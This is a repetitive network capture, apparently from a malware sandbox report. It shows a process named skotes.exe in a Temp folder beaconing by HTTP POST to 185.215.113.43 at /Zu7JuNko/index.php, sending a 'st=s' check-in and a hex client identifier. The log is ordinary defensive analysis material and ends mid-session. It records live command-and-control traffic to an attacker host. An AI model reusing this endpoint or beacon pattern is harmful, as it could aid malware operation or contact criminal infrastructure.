Dec 16, 2024 11:07:25.272095919 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:26.640031099 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50276	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:28.270169020 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:29.609157085 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50277	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:31.348218918 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:32.717983007 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50279	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:34.343034029 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:35.680207014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50280	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:37.419792891 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:38.762685061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50281	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:40.395798922 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:41.732177019 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50282	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:43.471882105 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:44.828639984 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50283	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:46.472417116 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:48.015279055 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50284	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:49.764266014 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:51.116784096 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50285	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:52.759485006 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:54.109196901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50286	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:55.854633093 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:57.196134090 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50287	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:58.830209970 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:00.196208954 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50288	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:01.945122004 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:03.281953096 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50289	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:04.919183969 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:06.270371914 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50290	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:08.014468908 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:09.347146988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50292	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:10.989042044 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:12.366894960 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50293	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:14.105041981 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:15.437396049 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50294	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:17.078305960 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:18.424669981 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50295	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:20.174926996 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:21.532582045 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50296	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:23.173263073 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:24.510791063 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Dec 16, 2024 11:08:25.058449984 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50300	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:26.246490002 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:27.594846010 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	50301	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:29.226803064 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:30.739917040 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	50302	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:32.478662968 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:33.828811884 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	50303	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
